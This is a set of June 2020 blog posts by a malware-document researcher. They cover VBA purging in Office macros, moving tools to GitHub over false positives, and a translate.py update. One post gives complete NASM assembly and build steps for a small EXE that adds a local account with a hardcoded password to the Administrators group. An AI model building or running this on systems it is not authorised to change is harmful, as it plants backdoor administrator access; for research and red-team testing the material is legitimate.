Didier Stevens

Monday 22 June 2020

VBA Purging

Filed under: maldoc — Didier Stevens @ 0:00

VBA code contained in Module Streams is made up of compiled code (PerformanceCache) and source code (CompressedSourceCode).

VBA stomping consist in altering or suppressing CompressedSourceCode and leaving the PerformanceCache unchanged:

As you can imagine, it must also be possible to change the PerformanceCache and leaving CompressedSourceCode unchanged:

Suppressing the PerformanceCache is a technique that I call VBA Purging:

More details can be found in a blog post I wrote here.

Tuesday 16 June 2020

FalsePositive GitHub Repository

Filed under: Announcement — Didier Stevens @ 0:00

As I’m fed up with Google’s false positives on some of my tools on DidierStevens.com, I’m moving them to a new GitHub repository: FalsePositives.

FYI, here is their User Agent String:

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)

Monday 8 June 2020

Update: translate.py Version 2.5.8

Filed under: My Software,Update — Didier Stevens @ 20:14

This is a small Python 3 bugfix version.

translate_v2_5_8.zip (https)
MD5: 677BD5D6007F264A05D23A9A01B3DD13
SHA256: 977D7A87F771F5E86A6B57D2B565D7C789A7AC7696599E8B7412E9051D66DCFF

Wednesday 3 June 2020

add-admin: Tiny EXE To Add Administrative Account

Filed under: My Software — Didier Stevens @ 0:00

I wrote a tiny EXE program (1,5 KB) that creates an account and adds it to the local administrators group.

It’s written in 32-bit assembly code (it’s not shellcode), and needs to be assembled with nasm and then linked to a PE file.

The first 3 %define statements define the account name, password and local group.

; Assembly code to add a new local user and make it member of Administrators group
; Written for NASM assembler (http://www.nasm.us) by Didier Stevens
; https://DidierStevens.com
; Use at your own risk
;
; Build:
;   nasm -f win32 add-admin.asm
;   Microsoft linker:
;     link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib
;       https://blog.didierstevens.com/2018/11/26/quickpost-compiling-with-build-tools-for-visual-studio-2017/
;       /fixed -> no relocation section
;       /debug:none /EMITPOGOPHASEINFO -> https://stackoverflow.com/questions/45538668/remove-image-debug-directory-from-rdata-section
;       /filealign:256 -> smaller, but no valid exe
;   MinGW linker:
;     ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32
;
; History:
;   2020/03/13
;   2020/03/14 refactor
;   2020/03/15 refactor

BITS 32

%define USERNAME 'hacker'
%define PASSWORD 'P@ssw0rd'
%define ADMINISTRATORS 'administrators'

global _main
extern _NetUserAdd@16
extern _NetLocalGroupAddMembers@20
extern _ExitProcess@4

	struc USER_INFO_1
		.uName RESD 1
		.Password RESD 1
		.PasswordAge RESD 1
		.Privilege RESD 1
		.HomeDir RESD 1
		.Comment RESD 1
		.Flags RESD 1
		.ScriptPath RESD 1
	endstruc
	
	struc LOCALGROUP_MEMBERS_INFO_3
		.lgrmi3_domainandname RESD 1
	endstruc

	USER_PRIV_USER EQU 1
	UF_SCRIPT EQU 1

	section .text
_main:
	mov     ebp, esp
	sub     esp, 4
	
	; NetUserAdd(NULL, level=1, buffer, NULL)
	lea     eax, [ebp-4]
	push    eax
	push    UI1
	push    1
	push    0
	call    _NetUserAdd@16
	
	; NetLocalGroupAddMembers(NULL, administrators, level=3, buffer, 1)
	push    1
	push    LMI3
	push    3
	push    ADMINISTRATORS_UNICODE
	push    0
	call    _NetLocalGroupAddMembers@20
	
	; ExitProcess(0)
	push    0
	call    _ExitProcess@4

; uncomment next line to put data structure in .data section (increases size PE file because of extra .data section)
;	section .data

UI1:
	istruc USER_INFO_1
		at USER_INFO_1.uName, dd USERNAME_UNICODE
		at USER_INFO_1.Password, dd PASSWORD_UNICODE
		at USER_INFO_1.PasswordAge, dd 0
		at USER_INFO_1.Privilege, dd USER_PRIV_USER
		at USER_INFO_1.HomeDir, dd 0
		at USER_INFO_1.Comment, dd 0
		at USER_INFO_1.Flags, dd UF_SCRIPT
		at USER_INFO_1.ScriptPath, dd 0
	iend

USERNAME_UNICODE:
	db      __utf16le__(USERNAME), 0, 0

PASSWORD_UNICODE:
	db      __utf16le__(PASSWORD), 0, 0

ADMINISTRATORS_UNICODE:
	db      __utf16le__(ADMINISTRATORS), 0, 0

LMI3:
	istruc LOCALGROUP_MEMBERS_INFO_3
		at LOCALGROUP_MEMBERS_INFO_3.lgrmi3_domainandname, dd USERNAME_UNICODE
	iend


Monday 1 June 2020

Overview of Content Published in May

Filed under: Announcement — Didier Stevens @ 0:00

Here is an overview of content I published in May:

Blog posts:

YouTube videos:

Videoblog posts:

SANS ISC Diary entries:

Blog at WordPress.com.